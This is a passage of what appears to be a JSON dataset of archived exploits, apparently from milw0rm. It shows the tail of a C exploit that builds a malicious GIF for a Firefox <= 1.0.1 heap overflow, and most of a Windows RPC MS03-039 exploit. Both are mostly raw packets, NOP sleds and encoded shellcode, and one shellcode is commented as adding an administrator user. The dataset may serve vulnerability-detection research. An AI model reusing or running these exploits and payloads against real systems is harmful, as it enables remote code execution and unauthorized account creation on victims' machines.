0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x40, 0x00, 0x40, 0x00, 0x41, 0x41, 0x41, 0x41, 0x14, 0x02, 0x08, 0x08, 0x00, 0x00, 0x44,\n\n\t0x44, 0x44, 0xEB, 0x14, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xFD, 0x7E, 0xD8, 0x77, 0xB4, 0x73,\n\n        0xED, 0x77, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,\n\n        0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,\n\n        0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,\n\n        0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,\n\n        0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,\n\n        0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,\n\n        0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,\n\n        0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x33, 0xC0, 0x50, 0x68, 0x63, 0x61, 0x6C,\n\n        0x63, 0x54, 0x5B, 0x50, 0x53, 0xB9, 0x44, 0x80, 0xC1, 0x77, 0xFF, 0xD1, 0x90, 0x90, 0x90, 0x90,\n\n        0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x01, 0x01, 0x00, 0x00, 0xFF, 0x90, 0x18,\n\n        0x57, 0x57, 0x57, 0x57, 0x47, 0x57, 0x47, 0x57, 0xFF, 0x90, 0x14, 0x89, 0xC3, 0x31, 0xFF, 0x68,\n\n        0x7F, 0x00, 0x00, 0x01, 0x68, 0x02, 0x00, 0xD9, 0x03, 0x89, 0xE1, 0x6A, 0x10, 0x51, 0x53, 0xFF,\n\n        0x90, 0x10, 0x85, 0xC0, 0x75, 0x44, 0x8D, 0x3C, 0x24, 0x31, 0xC0, 0x6A, 0x15, 0x59, 0xF3, 0xAB,\n\n        0xC6, 0x44, 0x24, 0x10, 0x44, 0xFE, 0x44, 0x24, 0x3D, 0x89, 0x5C, 0x24, 0x48, 0x89, 0x5C, 0x24,\n\n        0x4C, 0x89, 0x5C, 0x24, 0x50, 0x8D, 0x44, 0x24, 0x10, 0x54, 0x50, 0x51, 0x51, 0x6A, 0x08, 0x6A,\n\n        0x01, 0x51, 0x51, 0xFF, 0x75, 0x00, 0x51, 0xFF, 0x90, 0x28, 0x89, 0xE1, 0x68, 0xFF, 0xFF, 0xFF,\n\n        0xFF, 0xFF, 0x31, 0xFF, 0x90, 0x24, 0x57, 0xFF, 0x90, 0x0C, 0xFF, 0x90, 0x20, 0x53, 0x90, 0x56,\n\n        0x57, 0x8B, 0x6C, 0x24, 0x18, 0x8B, 0x45, 0x3C, 0x8B, 0x54, 0x05, 0x78, 0x01, 0xEA, 0x8B, 0x4A,\n\n        0x18, 0x8B, 0x5A, 0x20, 0x01, 0xEB, 0xE3, 0x32, 0x49, 0x8B, 0x34, 0x8B, 0x01, 0xEE, 0x31, 0xFF,\n\n        0xFC, 0x31, 0xC0, 0xAC, 0x38, 0xE0, 0x74, 0x07, 0xC1, 0xCF, 0x0D, 0x01, 0xC7, 0xEB, 0xF2, 0x3B,\n\n        0x7C, 0x24, 0x14, 0x75, 0xE1, 0x8B, 0x5A, 0x24, 0x01, 0xEB, 0x66, 0x8B, 0x0C, 0x4B, 0x8B, 0x5A,\n\n        0x1C, 0x01, 0xEB, 0x8B, 0x04, 0x8B, 0x01, 0xE8, 0xEB, 0x02, 0x31, 0xC0, 0x89, 0xEA, 0x5F, 0x5E,\n\n        0x5D, 0x5B, 0xC2, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00\n\n};\n\n\n\nint main()\n\n{\n\n\n\n FILE *fs;\n\n\n\n printf(\"\\n\");\n\n printf(\" * Mozilla FireFox <= 1.0.1 Remote/Local GIF Heap Overflow Exploit\\n\");\n\n printf(\" * coded by Darkeagle\\n\");\n\n printf(\" * [uKt research] http://unl0ck.org\\n\");\n\n\n\n fs = fopen(FILENAME, \"w+\");\n\n\n\n // just go, y0!\n\n\n\n fwrite(data1, sizeof ( unsigned char ), sizeof(data1), fs);\n\n\n\n printf(\" * [Evil done]\\n\");\n\n\n\n fclose(fs);\n\n printf(\" * [Firesnake.gif created!]\\n\");\n\n printf(\" * [Enjoy!]\\n\\n\");\n\n\n\n return 0;\n\n\n\n}\n\n\n\n# milw0rm.com [2005-07-05]",
485        "vulnerable": true
486    },
487    {
488        "exploit_id": 109,
489        "content": "/*  Windows RPC2 Universal Exploit (MS03-039) & Remote DoS (RPC3)  */\n\n/*                    Must be used with the associated shell                        */\n\n/*                                                                                                  */\n\n/*           This exploit works against unpatched systems (MS03-039)     */\n\n/*             And cause a Denial of Service on patched systems (rpc3)     */\n\n\n\n\n\n#include <stdio.h> \n\n#include <winsock2.h> \n\n#include <windows.h> \n\n#include <process.h> \n\n#include <string.h> \n\n#include <winbase.h> \n\n\n\nFILE *fp1; \n\nunsigned char bindstr[]={ \n\n0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, \n\n0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00, \n\n0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00, \n\n0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, \n\n0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00}; \n\n\n\nunsigned char request1[]={ \n\n0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03 \n\n,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00 \n\n,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45 \n\n,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00 \n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E \n\n,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D \n\n,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41 \n\n,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00 \n\n,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45 \n\n,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 \n\n,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 \n\n,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03 \n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00 \n\n,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00 \n\n,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 \n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29 \n\n,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00 \n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00 \n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00 \n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00 \n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00 \n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00 \n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00 \n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00 \n\n,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00 \n\n,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10 \n\n,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF \n\n,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 \n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 \n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 \n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 \n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10 \n\n,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09 \n\n,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00 \n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00 \n\n,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00 \n\n,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00 \n\n,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00 \n\n,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 \n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00 \n\n,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01 \n\n,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03 \n\n,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00 \n\n,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E \n\n,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00 \n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 \n\n,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00 \n\n,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00 \n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00 \n\n,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00 \n\n,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00 \n\n,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 \n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00 \n\n,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00 \n\n,0x00,0x00,0x00,0x00,0x00,0x00}; \n\n\n\nunsigned char request2[]={ \n\n0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00 \n\n,0x00,0x00,0x5C,0x00,0x5C,0x00}; \n\n\n\nunsigned char request3[]={ \n\n0x46,0x00,0x43,0x00,0x24,0x00,0x46,0x00, \n\n0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00 \n\n,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 \n\n,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 \n\n,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00}; \n\n\n\n\n\nunsigned char request4[]={ \n\n0x01,0x10 \n\n,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00 \n\n,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C \n\n,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00 \n\n}; \n\nvoid XOR(unsigned char *buf,int offset,int lenght,unsigned char mask) \n\n{ \n\nfor(int i=offset;i<(offset+lenght);i++) \n\nbuf[i]=buf[i]^mask; \n\n} \n\nDWORD GETSTRCS(char *buf) \n\n{ \n\nDWORD cs=0; \n\nbool cld=false; \n\nfor(unsigned int i=0;i<strlen(buf);i++) \n\n{ \n\nfor(int z=0;z<13;z++) \n\n{ \n\nif(cs&1) cld=true; \n\ncs=cs>>1; \n\nif(cld) cs=cs|0x80000000; \n\ncld=false; \n\n} \n\ncs+=buf[i]; \n\n} \n\nreturn cs; \n\n} \n\n\n\nstruct { \n\nDWORD seh; \n\nDWORD jmp; \n\nDWORD heap; \n\nchar target[200]; \n\n} target_os[]= \n\n{ \n\n{ \n\n0x005Bfd2c, \n\n0x00081eeb, \n\n0x00180000, \n\n\"WinXP\" \n\n}, \n\n{ \n\n0x0095fd3c, \n\n0x00081eeb, \n\n0x00170000, \n\n\"Win2K\" \n\n} \n\n},v; \n\nunsigned char rawData1[]= \n\n\"\\x6C\\x00\\x6F\\x00\\x63\\x00\\x61\\x00\\x6C\\x00\\x68\\x00\" \n\n\"\\x6F\\x00\\x73\\x00\\x74\\x00\\x5C\\x00\\x43\\x00\\x24\\x00\\x5C\\x00\" \n\n\n\n\"\\x58\\x00\\xeb\\x3c\\x46\\x00\\x46\\x00\\xeb\\x7c\\x46\\x00\\x46\\x00\\x38\\x6e\" \n\n\"\\xeb\\x02\\xeb\\x05\\xe8\\xf9\\xff\\xff\\xff\\x58\\x83\\xc0\\x1b\\x8d\\xa0\\x01\" \n\n\"\\xeb\\x1e\\xff\\x83\\xe4\\xfc\\x8b\\xec\\x33\\xc9\\x66\\xb9\\x99\\x01\\x80\\x30\" \n\n\"\\xf6\\xe0\\xe0\\x93\\xdf\\xfc\\xf2\\xf7\\xeb\\x06\\xf1\\xe1\\xf2\\xe1\\xea\\xd2\" \n\n\n\n//SHELLCODE From SAM ,THANKs ! \n\n//Add user SST,password is 557, \n\n\"\\xEB\\x10\\x5A\\x4A\\x33\\xC9\\x66\\xB9\\x4D\\x01\\x80\\x34\\x0A\\x99\\xE2\\xFA\" \n\n\"\\xEB\\x05\\xE8\\xEB\\xFF\\xFF\\xFF\" \n\n\n\n\"\\x70\\xDA\\x98\\x99\\x99\\xCC\\x12\\x75\\x18\\x75\\x19\\x99\\x99\\x99\\x12\\x6D\" \n\n\"\\x71\\x92\\x98\\x99\\x99\\x10\\x9F\\x66\\xAF\\xF1\\x01\\x67\\x13\\x97\\x71\\x3C\" \n\n\"\\x99\\x99\\x99\\x10\\xDF\\x95\\x66\\xAF\\xF1\\xE7\\x41\\x7B\\xEA\\x71\\x0F\\x99\" \n\n\"\\x99\\x99\\x10\\xDF\\x89\\xFD\\x38\\x81\\x99\\x99\\x99\\x12\\xD9\\xA9\\x14\\xD9\" \n\n\"\\x81\\x22\\x99\\x99\\x8E\\x99\\x10\\x81\\xAA\\x59\\xC9\\xF3\\xFD\\xF1\\xB9\\xB6\" \n\n\"\\xF8\\xFD\\xF1\\xB9\\xEA\\xEA\\xED\\xF1\\xEC\\xEA\\xFC\\xEB\\xF1\\xF7\\xFC\\xED\" \n\n\"\\xB9\\x12\\x55\\xC9\\xC8\\x66\\xCF\\x95\\xAA\\x59\\xC9\\xF1\\xB9\\xAC\\xAC\\xAE\" \n\n\"\\xF1\\xB9\\xEA\\xEA\\xED\\xF1\\xEC\\xEA\\xFC\\xEB\\xF1\\xF7\\xFC\\xED\\xB9\\x12\" \n\n\"\\x55\\xC9\\xC8\\x66\\xCF\\x95\\xAA\\x59\\xC9\\xF1\\xFD\\xFD\\x99\\x99\\xF1\\xED\" \n\n\"\\xB9\\xB6\\xF8\\xF1\\xEA\\xB9\\xEA\\xEA\\xF1\\xF8\\xED\\xF6\\xEB\\xF1\\xF0\\xEA\" \n\n\"\\xED\\xEB\\xF1\\xFD\\xF4\\xF0\\xF7\\xF1\\xEC\\xE9\\xB9\\xF8\\xF1\\xF5\\xFE\\xEB\" \n\n\"\\xF6\\xF1\\xF5\\xF6\\xFA\\xF8\\xF1\\xF7\\xFC\\xED\\xB9\\x12\\x55\\xC9\\xC8\\x66\" \n\n\"\\xCF\\x95\\xAA\\x59\\xC9\\x66\\xCF\\x89\\xCA\\xCC\\xCF\\xCE\\x12\\xF5\\xBD\\x81\" \n\n\"\\x12\\xDC\\xA5\\x12\\xCD\\x9C\\xE1\\x9A\\x4C\\x12\\xD3\\x81\\x12\\xC3\\xB9\\x9A\" \n\n\"\\x44\\x7A\\xAB\\xD0\\x12\\xAD\\x12\\x9A\\x6C\\xAA\\x66\\x65\\xAA\\x59\\x35\\xA3\" \n\n\"\\x5D\\xED\\x9E\\x58\\x56\\x94\\x9A\\x61\\x72\\x6B\\xA2\\xE5\\xBD\\x8D\\xEC\\x78\" \n\n\"\\x12\\xC3\\xBD\\x9A\\x44\\xFF\\x12\\x95\\xD2\\x12\\xC3\\x85\\x9A\\x44\\x12\\x9D\" \n\n\"\\x12\\x9A\\x5C\\x72\\x9B\\xAA\\x59\\x12\\x4C\\xC6\\xC7\\xC4\\xC2\\x5B\\x9D\\x99\" \n\n\"\\xCC\\xCF\\xFD\\x38\\xA9\\x99\\x99\\x99\\x1C\\x59\\xE1\\x95\\x12\\xD9\\x95\\x12\" \n\n\"\\xE9\\x85\\x34\\x12\\xF1\\x91\\x72\\x90\\x12\\xD9\\xAD\\x12\\x31\\x21\\x99\\x99\" \n\n\"\\x99\\x12\\x5C\\xC7\\xC4\\x5B\\x9D\\x99\\x71\\x21\\x67\\x66\\x66\" \n\n\n\n\"\\x6e\\x60\\x38\\xcc\\x54\\xd6\\x93\\xd7\\x93\\x93\\x93\\x1a\\xce\\xaf\\x1a\\xce\" \n\n\"\\xab\\x1a\\xce\\xd3\\x54\\xd6\\xbf\\x92\\x92\\x93\\x93\\x1e\\xd6\\xd7\\xc3\\xc6\" \n\n\"\\xc2\\xc2\\xc2\\xd2\\xc2\\xda\\xc2\\xc2\\xc5\\xc2\\x6c\\xc4\\x77\\x6c\\xe6\\xd7\" \n\n\"\\x6c\\xc4\\x7b\\x6c\\xe6\\xdb\\x6c\\xc4\\x7b\\xc0\\x6c\\xc4\\x6b\\xc3\\x6c\\xc4\" \n\n\"\\x7f\\x19\\x95\\xd5\\x17\\x53\\xe6\\x6a\" \n\n\"\\xc2\\xc1\\xc5\\xc0\\x6c\\x41\\xc9\\xca\" \n\n\"\\x1a\\x94\\xd4\\xd4\\xd4\\xd4\\x71\\x7a\\x50\\x90\\x90\\x90\" // \n\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \n\n\"\\x77\\xe0\\x43\\x00\\x00\\x10\\x5c\\x00\" \n\n\"\\xeb\\x1e\\x01\\x00\"// FOR CN SP3/SP4+-MS03-26 \n\n\"\\x4C\\x14\\xec\\x77\"// TOP SEH FOR cn w2k+SP4,must modify to SEH of your target's os \n\n\n\n\n\n//FILL BYTE,so sizeof(UNC)>0X400(0X80*8),why? You can read more form my artic \n\n//\"Utilization of released heap structure and exploit of universal Heap overflow in windows \". \n\n\"\\xEB\\x10\\x5A\\x4A\\x33\\xC9\\x66\\xB9\\x90\\x02\\x80\\x34\\x0A\\x99\\xE2\\xFA\" \n\n\"\\xEB\\x05\\xE8\\xEB\\xFF\\xFF\\xFF\" \n\n\"\\xC7\\x5F\\x9D\\xBD\\xDD\\x14\\xDD\\xBD\\xDD\\xC9\\x14\\xDD\\xBD\\x9D\\xC9\\x14\" \n\n\"\\x1D\\xBD\\x1D\\x99\\x99\\x99\\xC9\\x14\\x1D\\xBD\\x0D\\x99\\x99\\x99\\xC9\\xAA\" 